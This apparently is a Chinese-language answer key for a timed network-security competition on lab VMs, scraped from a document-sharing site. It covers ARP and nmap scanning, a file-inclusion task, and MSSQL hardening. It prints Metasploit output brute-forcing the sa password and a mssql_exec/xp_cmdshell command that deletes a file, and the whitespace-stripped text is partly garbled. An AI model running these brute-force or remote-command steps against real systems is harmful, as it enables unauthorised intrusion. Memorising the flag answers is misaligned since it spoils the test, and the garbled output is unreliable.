版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
.一、竞赛时间9:00-12:00,共计3小时。1(一)拓扑图任务1.ARP扫描渗透测试任务环境说明:1:..✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;Arping–c52.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;Arping–c5root@kali:~#arping-c5ARPINGfrometh0Unicastreplyfrom[00:0C:29:62:80:73]1.017msUnicastreplyfrom[00:0C:29:62:80:73]0.638msUnicastreplyfrom[00:0C:29:62:80:73]1.051msUnicastreplyfrom[00:0C:29:62:80:73]1.590msUnicastreplyfrom[00:0C:29:62:80:73]1.051msSent5probes(1broadcast(s))Received5response(s)Flag:53.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;msf>useauxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;msf>useauxiliary/scanner/discovery/arp_sweepmsfauxiliary(arp_sweep)>run[*]appearstobeup(VMware,Inc.).[*]appearstobeup(VMware,Inc.).[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedFlag:completed5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;msfauxiliary(arp_sweep)>run[*]appearstobeup(VMware,Inc.).[*]appearstobeup(VMware,Inc.).2:..[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedFlag:appears6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;Flag:exploitorrun任务2.操作系统及应用程序扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap–n–Sp2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;root@kali:~#nmap-n-sPStartingNmap7.40()at2017-12-1019:59ESTNmapscanreportforHostisup(0.00069slatency).Nmapdone:1IPaddress(1hostup)scannedin0.09secondsFlag:up3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~#nmap-n-AStartingNmap7.40()at2017-12-1020:11ESTNmapscanreportforHostisup(0.00025slatency).Notshown:998closedportsPORTSTATESERVICEVERSION22/tcpopenssh|ssh-hostkey:OpenSSH4.3(protocol2.0)|102495:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08(DSA)|_204890:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd(RSA)111/tcpopenrpcbind2(RPC#100000)|rpcinfo:|programversionport/protoservice|1000002111/tcprpcbind|1000002111/udprpcbind3:..|1000241|_1000241910/udpstatus913/tcpstatusMACAddress:00:0C:29:62:80:73(VMware)Devicetype:generalpurposeRunning:Linux2.6.XOSCPE:cpe:/o:linux:linux_kernel:2.6OSdetails:Linux2.6.9-NetworkDistance:1hopTRACEROUTEHOPRTTADDRESS10.25msOSandServicedetectionperformed.Pleasereportanyincorrectresultsat/.Nmapdone:1IPaddress(1hostup)scannedin8.22secondsFlag:Nmap–n–A4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;root@kali:~#nmap-n-AStartingNmap7.40()at2017-12-1020:11ESTNmapscanreportforHostisup(0.00025slatency).Notshown:998closedportsPORTSTATESERVICEVERSION22/tcpopenssh|ssh-hostkey:OpenSSH4.3(protocol2.0)|102495:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08(DSA)|_204890:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd(RSA)111/tcpopenrpcbind2(RPC#100000)|rpcinfo:|programversionport/protoservice|1000002|1000002|1000241|_1000241111/tcprpcbind111/udprpcbind910/udpstatus913/tcpstatusMACAddress:00:0C:29:62:80:73(VMware)Devicetype:generalpurposeRunning:Linux2.6.XOSCPE:cpe:/o:linux:linux_kernel:2.6OSdetails:Linux2.6.9-NetworkDistance:1hopTRACEROUTEHOPRTT10.25msADDRESS4:..OSandServicedetectionperformed.Pleasereportanyincorrectresultsat/.Nmapdone:1IPaddress(1hostup)scannedin8.22secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~#nmap-OStartingNmap7.40()at2017-12-1020:13ESTNmapscanreportforHostisup(0.00044slatency).Notshown:998closedportsPORTSTATESERVICE22/tcpopenssh111/tcpopenrpcbindMACAddress:00:0C:29:62:80:73(VMware)Devicetype:generalpurposeRunning:Linux2.6.XOSCPE:cpe:/o:linux:linux_kernel:2.6OSdetails:Linux2.6.9-NetworkDistance:1hopOSdetectionperformed.Pleasereportanyincorrectresultsat/.Nmapdone:1IPaddress(1hostup)scannedin14.80secondsFlag:Nmap–O6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap–sV7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;root@kali:~#nmap-sVStartingNmap7.40()at2017-12-1020:17ESTNmapscanreportforHostisup(0.00014slatency).Notshown:998closedportsPORTSTATESERVICEVERSIONOpenSSH4.3(protocol2.0)22/tcpopenssh111/tcpopenrpcbind2(RPC#100000)MACAddress:00:0C:29:62:80:73(VMware)Servicedetectionperformed.Pleasereportanyincorrectresultsat/.Nmapdone:1IPaddress(1hostup)scannedin19.60secondsFlag:OpenSSH4.35:..任务3.Web应用程序文件包含安全攻防任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:MicrosoftWindows2003Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:MicrosoftSqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.访问WebServ2003服务器场景,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2.对该任务题目1Flag提交;3.对该任务题目2Base64编码方式回显内容作为Flag提交;4.通过PHP函数对题目3中Base64作为Flag提交;5.进入WebServ2003DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交6.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:MicrosoftWindows2003Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:MicrosoftSqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;2.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;C:\DocumentsandSettings\Administrator>netstat-anActiveConnectionsProtoLocalAddressTCPForeignAddressLISTENINGState6:..TCPLISTENINGTCPLISTENINGTCPTCPLISTENINGLISTENINGUDP*:**:*UDPUDPUDP*:**:*UDPUDP*:**:*UDP*:**:*UDPFlag:LISTENING3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;msf>useauxiliary/scanner/mssql/mssql_pingmsfauxiliary(mssql_ping)>run[*][+][+][+][+][+][+]-SQLServerinformationfor------ServerNameInstanceNameIsClusteredVersiontcp=SERVER=MSSQLSERVER=No==1433=\\SERVER\pipe\sql\querynp[*]Scanned1of1hosts(100%complete)[*]Auxiliarymoduleexecutioncompleted4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;msf>useauxiliary/scanner/mssql/mssql_loginmsfauxiliary(mssql_login)>setusernamesamsfauxiliary(mssql_login)>setpass_file/usr/share/wordlists/metasploit/password.lstmsfauxiliary(mssql_login)>run[*][!][-][-][-][-][-][-][-][-]--MSSQL-Startingauthenticationscanner.-NoactiveDB--Credentialdatawillnotbesaved!--LOGINFAILED:WORKSTATION\sa:!@#$%(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!@#$%^(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!@#$%^&(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!@#$%^&*(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!boerbul(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!boerseun(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!gatvol(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!hotnot(Incorrect:)7:..[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][+]--LOGINFAILED:WORKSTATION\sa:!kak(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!koedoe(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!likable(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!poes(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!pomp(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!soutpiel(Incorrect:)--LOGINFAILED:WORKSTATION\sa:.net(Incorrect:)--LOGINFAILED:WORKSTATION\sa:0(Incorrect:)--LOGINFAILED:WORKSTATION\sa:000000(Incorrect:)--LOGINFAILED:WORKSTATION\sa:00000000(Incorrect:)--LOGINFAILED:WORKSTATION\sa:0007(Incorrect:)--LOGINFAILED:WORKSTATION\sa:007(Incorrect:)--LOGINFAILED:WORKSTATION\sa:007007(Incorrect:)--LOGINFAILED:WORKSTATION\sa:0s(Incorrect:)--LOGINFAILED:WORKSTATION\sa:0th(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1(Incorrect:)--LOGINFAILED:WORKSTATION\sa:10(Incorrect:)--LOGINFAILED:WORKSTATION\sa:100(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1000(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1000s(Incorrect:)--LOGINFAILED:WORKSTATION\sa:100s(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1022(Incorrect:)--LOGINFAILED:WORKSTATION\sa:10s(Incorrect:)--LOGINFAILED:WORKSTATION\sa:10sne1(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1111(Incorrect:)--LOGINFAILED:WORKSTATION\sa:11111(Incorrect:)--LOGINFAILED:WORKSTATION\sa:111111(Incorrect:)--LOGINFAILED:WORKSTATION\sa:(Incorrect:)--LOGINFAILED:WORKSTATION\sa:112233(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1212(Incorrect:)--LOGINFAILED:WORKSTATION\sa:121212(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1213(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1214(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1225(Incorrect:)--LOGINFAILED:WORKSTATION\sa:123(Incorrect:)--LOGINFAILED:WORKSTATION\sa:123123(Incorrect:)--LOGINFAILED:WORKSTATION\sa:123321(Incorrect:)--LOGINFAILED:WORKSTATION\sa:1234(Incorrect:)--LOGINFAILED:WORKSTATION\sa:12345(Incorrect:)--LOGINSUCCESSFUL:WORKSTATION\sa:123456[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedFlag:completed8:..5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag提交;msfauxiliary(mssql_login)>useauxiliary/admin/mssql/mssql_execmsfauxiliary(mssql_exec)>setrhostmsfauxiliary(mssql_exec)>setpassword123456msfauxiliary(mssql_exec)>setcmdcmd.exe/cdel"C:\\1.txt"msfauxiliary(mssql_exec)>run[*]-SQLQuery:EXECmaster..xp_cmdshell'cmd.exe/cdelC:\1.txt'output------[*]AuxiliarymoduleexecutioncompletedFlag:[*]-SQLQuery:EXECmaster..xp_cmdshell'cmd.exe/cdelC:\1.txt'6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交:W7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件3行内容作为Flag提交;msfauxiliary(mssql_login)>run[*][!][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]--MSSQL-Startingauthenticationscanner.-NoactiveDB--Credentialdatawillnotbesaved!--LOGINFAILED:WORKSTATION\sa:!@#$%(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!@#$%^(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!@#$%^&(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!@#$%^&*(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!boerbul(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!boerseun(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!gatvol(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!hotnot(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!kak(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!koedoe(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!likable(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!poes(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!pomp(Incorrect:)--LOGINFAILED:WORKSTATION\sa:!soutpiel(Incorrect:)--LOGINFAILED:WORKSTATION\sa:.net(Incorrect:)--LOGINFAILED:WORKSTATION\sa:0(Incorrect:)--LOGINFAILED:WORKSTATION\sa:000000(Incorrect:)--LOGINFAILED:WORKSTATION\sa:00000000(I
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 幕墙清包合同范例
- 城镇建房集资合同范例
- 车间员工合同范例
- 医院赔偿协议合同范例
- 室内电线购买合同范例
- 境外设计合同范例
- 零首付商业贷款合同范例
- 工程吊装打包服务合同范例
- 产品拍摄合同范例
- 砂场劳务合同范例
- 蓝色商务风汽车行业商业计划书模板
- 2024-2025学年人教版数学六年级上册 期末综合卷(含答案)
- 信息服务政府采购合同范例
- 2024年心理咨询师考试题库【典型题】
- 送教上门情况记录表多篇
- 新时代大学生劳动教育与实践 课件 第二章 劳动是职业生涯发展的重要支撑
- 贵州省贵阳市实验三中2024年高三第二次联合考试数学试题试卷
- 护士四页简历12模版
- 2024年江西省公务员考试《行测》真题及答案解析
- 2024年中国气体净化器市场调查研究报告
- 2024年高考真题-生物(江苏卷) 含答案
评论
0/150
提交评论